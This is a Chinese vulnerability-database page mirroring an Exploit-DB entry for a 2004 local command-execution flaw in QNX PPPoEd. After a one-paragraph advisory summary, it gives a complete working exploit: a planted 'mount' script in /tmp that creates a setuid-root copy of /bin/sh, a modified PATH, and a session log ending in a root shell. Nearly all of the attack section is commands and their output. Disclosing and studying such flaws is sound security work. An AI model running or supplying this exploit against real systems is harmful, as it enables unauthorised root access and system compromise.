QNX PPPoEd 2.4/4.25/6.2 – Path Environment Variable Local Command Execution

QNX PPPoEd 2.4/4.25/6.2 – Path Environment Variable Local Command Execution

漏洞ID 1054580 漏洞类型
发布时间 2004-09-03 更新时间 2004-09-03
图片[1]-QNX PPPoEd 2.4/4.25/6.2 – Path Environment Variable Local Command Execution-安全小百科CVE编号 N/A
图片[2]-QNX PPPoEd 2.4/4.25/6.2 – Path Environment Variable Local Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24570
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11105/info

QNX PPoEd is reported prone to a problem that exists in the handling of paths to external executables that are employed by PPPoEd. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#

相关推荐: Multiple Cisco FWSM Vulnerabilities

Multiple Cisco FWSM Vulnerabilities 漏洞ID 1099218 漏洞类型 Unknown 发布时间 2003-12-15 更新时间 2003-12-15 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享